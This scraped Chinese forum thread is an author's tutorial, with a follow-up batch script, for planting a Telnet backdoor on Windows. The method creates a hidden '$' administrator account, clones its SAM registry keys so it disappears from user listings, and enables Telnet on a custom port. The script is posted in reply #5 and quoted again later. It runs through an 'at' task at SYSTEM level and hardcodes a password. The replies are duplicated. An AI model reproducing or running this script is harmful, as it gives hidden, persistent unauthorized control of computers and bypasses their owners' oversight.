【原创】Telnet后门制作,附带 IIS 的组件文件,和 半自动生成Telnet后门 的批处理

时间:2021-02-28 15:19:15
半自动生成Telnet后门.rar(解压密码是:dianyancao@126.com)
http://www.nohack.cn/bbs/attachment.php?aid=MjE5MDN8MWMzYWU4ZTB8MTI2MDU5MDA1N3wxOWI1TmhoYW5NNUxDb3JsS014K2xHdjJOWno0Q250NmRoMDB2SUZCblYwdXc3Zw%3D%3D
组件文件.rar (解压密码是:dianyancao@126.com)
http://www.nohack.cn/bbs/viewthread.php?tid=111695&extra=
首先新建一个隐藏用户  $
具体操作:
新建用户 $ ,设置属性(用户不能更改密码)(密码永不到期)
并且为该用户设置较长的密码
打开用户 $ 的 属性的隶属于项
接着删除其中的Users组
并且把用户 $ 加入 Administrators组
在注册表中把 HKEY_LOCAL_MACHINE\SAM\SAM项的权限设置为
允许Administrators组完全控制,然后刷新该项
进入项 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$ 
找到用户 $ 的 默认值类型,记住该类型(0x???),并导出 $ 项为 "用户标识符.reg"
再进入项 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 之中
寻找和上面的类型相匹配的项,并将其导出为 "用户信息.reg"
最后在计算机用户管理中,删除用户 $ ,并导入上述两个注册表文件
再将用户 $ 加入 TelnetClients用户组
在计算机用户组管理中新建 TelnetClients 组
然后将用户 $ 添加成为 TelnetClients用户组 的成员


配置Telnet服务
在计算机服务管理中,启用Telnet服务,并将其 启动类型 设置为 自动
运行cmd.exe,开始命令行操作,输入命令:
tlntadmn config port= ???? &echo “????”是小于1024的正整数


测试Telnet服务
开始命令行操作,输入命令:
telnet 127.0.0.1 ???? &echo “????”是上面设置的Telnet服务端口
由于测试的是本机的Telnet,所以输入上述命令后有显示:
您将要把您的密码信息送到 Internet 区内的一台远程计算机上。这可能不安全。您还要送
吗(y/n):n
选择N,然后显示
Welcome to Microsoft Telnet Service

login: $
password:
输入用户名和密码,确定
若出现欢迎信息:Welcome to Microsoft Telnet Server.
那么就可以在网络上,用用户 $ 和密码,远程登录该计算机了。


使用Telnet进行远程控制
远程登录计算机控制台后,就可以用命令行操作运行程序了,使用方法和本地cmd相同。
推荐本地使用的命令:
ftp -? &echo 使用ftp命令需要远程系统添加Windows组件,即Internet 信息服务(IIS)

Transfers files to and from a computer running an FTP server service
(sometimes called a daemon). Ftp can be used interactively.

FTP [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]

  -v             Suppresses display of remote server responses.
  -n             Suppresses auto-login upon initial connection.
  -i             Turns off interactive prompting during multiple file
                 transfers.
  -d             Enables debugging.
  -g             Disables filename globbing (see GLOB command).
  -s:filename    Specifies a text file containing FTP commands; the
                 commands will automatically run after FTP starts.
  -a             Use any local interface when binding data connection.
  -A             login as anonymous.
  -w:buffersize  Overrides the default transfer buffer size of 4096.
  host           Specifies the host name or IP address of the remote
                 host to connect to.

Notes:
  - mget and mput commands take y/n/q for yes/no/quit.
  - Use Control-C to abort commands.

ftp -a 127.0.0.1
ftp> help
Commands may be abbreviated.  Commands are:

!               delete          literal         prompt          send
?               debug           ls              put             status
append          dir             mdelete         pwd             trace
ascii           disconnect      mdir            quit            type
bell            get             mget            quote           user
binary          glob            mkdir           recv            verbose
bye             hash            mls             remotehelp
cd              help            mput            rename
close           lcd             open            rmdir

C:\>net use /?
此命令的语法是:


NET USE
[devicename | *] [\\computername\sharename[\volume] [password | *]]
        [/USER:[domainname\]username]
        [/USER:[dotted domain name\]username]
        [/USER:[username@dotted domain name]
        [/SMARTCARD]
        [/SAVECRED]
        [[/DELETE] | [/PERSISTENT:{YES | NO}]]

NET USE {devicename | *} [password | *] /HOME

NET USE [/PERSISTENT:{YES | NO}]
示例:net use z: \\127.0.0.1\ipc$

推荐远程控制台的使用命令:

at /? &echo 用于在指定时间运行程序
reg /? &echo 用于修改注册表
attrib /? &echo 用于修改文件属性(隐藏,系统,只读)
net share /? &echo 用于开启共享
start /? &echo 用于立即执行指定程序
sc create /? &echo 用于生成服务
sc delete /? &echo 用于删除服务
sc query state= all >>c:\ServicesList.txt &echo 会生成所有服务详细信息到文本文件
shutdown -? &echo 用于关机,注销,重启
net start dot3svc &netsh lan reconnect interface="本地连接" &echo 重新启动“本地连接”
netsh interface ip set address "本地连接" static 192.168.1.24 255.255.255.0 192.168.1.1 1 &echo 修改本地连接的IP地址

附:(Internet 信息服务 IIS的添加)
打开§控制面板§,执行§添加删除程序§,点击§添加/删除Windows组件§,弹出§Windows 组件向导§
点击§Internet 信息服务(IIS)§,再点击§详细信息(D)...§,勾选§文件传输协议(FTP)服务§
系统将自动选择§Internet 信息服务管理单元§,§公用文件§和§文件传输协议(FTP)服务§,
如果需要§万维网服务§,也可选择上勾。选择完毕,单击确定,进行下一步,系统开始执行安装。
安装过程需要插入 XP系统的安装光盘,以便复制I386文件夹中的数据,当然也可以使用下面上传的§组件文件.RAR§
组件安装完成后,开始配置§Internet 信息服务§。
运行c:\windows\system32\inetsrv\iis.msc,打开Internet 信息服务
进入(本地计算机)的树形结构,进入§FTP 站点§,选择§默认 FTP 站点§的属性,开始设置。
点击§安全账户§,推荐选择只允许匿名连接(L),点击§主目录§,设置§本地路径§为你要共享的文件夹,拒绝写入,
即不勾选§写入(W)§,到此设置完毕,已经可以通过网址:  ftp://127.0.0.1/,访问共享目录了。 

61 个解决方案

#1


把批处理的源代码直接贴出来看看?

#2


#3


net user命令之后不会出现吗?

#4


引用 3 楼 guyawansong 的回复:
net user命令之后不会出现吗?


不会出现吧
只能去看注册表

#5


贴上源代码

@echo off
color a

echo 此批处理由★☆●◎▓╬⊕   dianyancao@126.com   ※фжшй¤制作

pause
del c:\1.bat /f /s /q /a
echo @echo off>>c:\1.bat
echo setlocal enabledelayedexpansion>>c:\1.bat
echo color a>>c:\1.bat
echo echo 此批处理由★☆●◎▓╬⊕   dianyancao@126.com   ※фжшй¤制作>>c:\1.bat
echo pause>>c:\1.bat
echo at /del /yes>>c:\1.bat
echo c:>>c:\1.bat
echo cd\>>c:\1.bat
echo net user $ nohack.cn /add>>c:\1.bat
echo net localgroup users $ /del>>c:\1.bat
echo net localgroup administrators $ /add>>c:\1.bat
echo reg export HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$ 1.reg>>c:\1.bat
echo type 1.reg>>c:\1.bat
echo set /p type=请输入上面@=hex()括号中的3个字符!>>c:\1.bat
echo reg export HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\00000!type! 2.reg>>c:\1.bat
echo net user $ /del>>c:\1.bat
echo reg import 1.reg>>c:\1.bat
echo reg import 2.reg>>c:\1.bat
echo del 1.reg>>c:\1.bat
echo del 2.reg>>c:\1.bat
echo net localgroup TelnetClients /add>>c:\1.bat
echo net localgroup telnetclients /comment:"TelnetClients 组中的成员被赋予远程登录计算机的权限">>c:\1.bat
echo net localgroup TelnetClients $ /add>>c:\1.bat
echo set /p port=请输入你要设置的Telnet服务端口,必须是小于1024的正整数!>>c:\1.bat
echo tlntadmn config port= !port!>>c:\1.bat
echo echo 开始测试Telnet服务!>>c:\1.bat
echo echo 温馨提示:>>c:\1.bat
echo color c>>c:\1.bat
echo echo 登录用户名为 $ ,密码是: nohack.cn>>c:\1.bat
echo echo 登录成功后,请自行对Telnet后门进行优化!要使用的命令行语句有:>>c:\1.bat
echo echo cd..>>c:\1.bat
echo echo attrib $ +s +h>>c:\1.bat
echo echo attrib $.%userdomain% +s +h>>c:\1.bat
echo pause>>c:\1.bat
echo :a>>c:\1.bat
echo telnet 127.0.0.1 !port!>>c:\1.bat
echo if not !username!==$ (>>c:\1.bat
echo echo 未能登录,重新测试!>>c:\1.bat
echo pause>>c:\1.bat
echo goto a>>c:\1.bat
echo )>>c:\1.bat

setlocal enabledelayedexpansion
set hh=%time:~0,2%
set mm=%time:~3,2%
if !mm!==59 (
    set mm=00
    if !hh!==23 (
        set hh=00
    ) else (
        set /a hh=!hh!+1
    )
) else (
    set /a mm=!mm!+1
)
at !hh!:!mm! /interactive /every: "c: &cd\ &c:\1.bat"
echo 稍后一分钟内!hh!:!mm!分时将以系统权限编辑注册表
pause

#6


set /p type=请输入上面@=hex()括号中的3个字符!

这里不能改成自动获取吗?

#7


看了 for /f 的帮助。
还是不懂处理文本,提取字符
求助ljc007,帮助我吧!

#8


learn

#9


学习了~~~~

#10


贴上源代码

#11


mark!

#12


问题是怎么Telnet到远程机器上啊,用户名密码呢?

#13


该回复于2009-12-17 17:04:50被版主删除

#14


very strong

#15


好麻烦。

#16


好麻烦。

#17


牛人呀

#18


学习

#19


MARK

#20


该回复于2009-12-18 10:13:11被版主删除

#21


密码自己修改批处理设置。
echo net user $ nohack.cn /add>>c:\1.bat 
引用 5 楼 dianyancao 的回复:
echo echo 登录用户名为 $ ,密码是: nohack.cn>>c:\1.bat 
echo echo 登录成功后,请自行对Telnet后门进行优化!要使用的命令行语句有:>>c:\1.bat 
echo echo cd..>>c:\1.bat 
echo echo attrib $ +s +h>>c:\1.bat 
echo echo attrib $.%userdomain% +s +h>>c:\1.bat 

#22


telnet已死,有事烧纸

#23


ty

#24


学习中,很不错的贴子

#25


ding.........

#26


study

#27


首先新建一个隐藏用户  $ 

你怎么在别人的服务器上新建一个用户??

#28


唉,编程是我的弱项,不过还是很想学。

#29


~~~~~~~~~

#30


telnet已死, 小事烧纸,大事挖坟

#31


试试

#32


KANKAN

#33


不错的教程

#34


up

#35


接分走人

#36


mark

#37


高手,会玩smtp吗?

#38


MARK!以后有兴趣再看

#39


引用 37 楼 fredjiang_sh 的回复:
高手,会玩smtp吗?


Stmp我就会,哈哈~~

#40


ding

#41


学习了~~~~

#42


谢谢分享

#43


呵呵,收藏!

#44


Mark先。

#45


飘过

#46


sf!

#47


学习

#48


study

#49


ding.........

#50


学习

#1


把批处理的源代码直接贴出来看看?

#2


#3


net user命令之后不会出现吗?

#4


引用 3 楼 guyawansong 的回复:
net user命令之后不会出现吗?


不会出现吧
只能去看注册表

#5


贴上源代码

@echo off
color a

echo 此批处理由★☆●◎▓╬⊕   dianyancao@126.com   ※фжшй¤制作

pause
del c:\1.bat /f /s /q /a
echo @echo off>>c:\1.bat
echo setlocal enabledelayedexpansion>>c:\1.bat
echo color a>>c:\1.bat
echo echo 此批处理由★☆●◎▓╬⊕   dianyancao@126.com   ※фжшй¤制作>>c:\1.bat
echo pause>>c:\1.bat
echo at /del /yes>>c:\1.bat
echo c:>>c:\1.bat
echo cd\>>c:\1.bat
echo net user $ nohack.cn /add>>c:\1.bat
echo net localgroup users $ /del>>c:\1.bat
echo net localgroup administrators $ /add>>c:\1.bat
echo reg export HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$ 1.reg>>c:\1.bat
echo type 1.reg>>c:\1.bat
echo set /p type=请输入上面@=hex()括号中的3个字符!>>c:\1.bat
echo reg export HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\00000!type! 2.reg>>c:\1.bat
echo net user $ /del>>c:\1.bat
echo reg import 1.reg>>c:\1.bat
echo reg import 2.reg>>c:\1.bat
echo del 1.reg>>c:\1.bat
echo del 2.reg>>c:\1.bat
echo net localgroup TelnetClients /add>>c:\1.bat
echo net localgroup telnetclients /comment:"TelnetClients 组中的成员被赋予远程登录计算机的权限">>c:\1.bat
echo net localgroup TelnetClients $ /add>>c:\1.bat
echo set /p port=请输入你要设置的Telnet服务端口,必须是小于1024的正整数!>>c:\1.bat
echo tlntadmn config port= !port!>>c:\1.bat
echo echo 开始测试Telnet服务!>>c:\1.bat
echo echo 温馨提示:>>c:\1.bat
echo color c>>c:\1.bat
echo echo 登录用户名为 $ ,密码是: nohack.cn>>c:\1.bat
echo echo 登录成功后,请自行对Telnet后门进行优化!要使用的命令行语句有:>>c:\1.bat
echo echo cd..>>c:\1.bat
echo echo attrib $ +s +h>>c:\1.bat
echo echo attrib $.%userdomain% +s +h>>c:\1.bat
echo pause>>c:\1.bat
echo :a>>c:\1.bat
echo telnet 127.0.0.1 !port!>>c:\1.bat
echo if not !username!==$ (>>c:\1.bat
echo echo 未能登录,重新测试!>>c:\1.bat
echo pause>>c:\1.bat
echo goto a>>c:\1.bat
echo )>>c:\1.bat

setlocal enabledelayedexpansion
set hh=%time:~0,2%
set mm=%time:~3,2%
if !mm!==59 (
    set mm=00
    if !hh!==23 (
        set hh=00
    ) else (
        set /a hh=!hh!+1
    )
) else (
    set /a mm=!mm!+1
)
at !hh!:!mm! /interactive /every: "c: &cd\ &c:\1.bat"
echo 稍后一分钟内!hh!:!mm!分时将以系统权限编辑注册表
pause

#6


set /p type=请输入上面@=hex()括号中的3个字符!

这里不能改成自动获取吗?

#7


看了 for /f 的帮助。
还是不懂处理文本,提取字符
求助ljc007,帮助我吧!

#8


learn

#9


学习了~~~~

#10


贴上源代码

#11


mark!

#12


问题是怎么Telnet到远程机器上啊,用户名密码呢?

#13


该回复于2009-12-17 17:04:50被版主删除

#14


very strong

#15


好麻烦。

#16


好麻烦。

#17


牛人呀

#18


学习

#19


MARK

#20


该回复于2009-12-18 10:13:11被版主删除

#21


密码自己修改批处理设置。
echo net user $ nohack.cn /add>>c:\1.bat 
引用 5 楼 dianyancao 的回复:
echo echo 登录用户名为 $ ,密码是: nohack.cn>>c:\1.bat 
echo echo 登录成功后,请自行对Telnet后门进行优化!要使用的命令行语句有:>>c:\1.bat 
echo echo cd..>>c:\1.bat 
echo echo attrib $ +s +h>>c:\1.bat 
echo echo attrib $.%userdomain% +s +h>>c:\1.bat 

#22


telnet已死,有事烧纸

#23


ty

#24


学习中,很不错的贴子

#25


ding.........

#26


study

#27


首先新建一个隐藏用户  $ 

你怎么在别人的服务器上新建一个用户??

#28


唉,编程是我的弱项,不过还是很想学。

#29


~~~~~~~~~

#30


telnet已死, 小事烧纸,大事挖坟

#31


试试

#32


KANKAN

#33


不错的教程

#34


up

#35


接分走人

#36


mark

#37


高手,会玩smtp吗?

#38


MARK!以后有兴趣再看

#39


引用 37 楼 fredjiang_sh 的回复:
高手,会玩smtp吗?


Stmp我就会,哈哈~~

#40


ding

#41


学习了~~~~

#42


谢谢分享

#43


呵呵,收藏!

#44


Mark先。

#45


飘过

#46


sf!

#47


学习

#48


study

#49


ding.........

#50


学习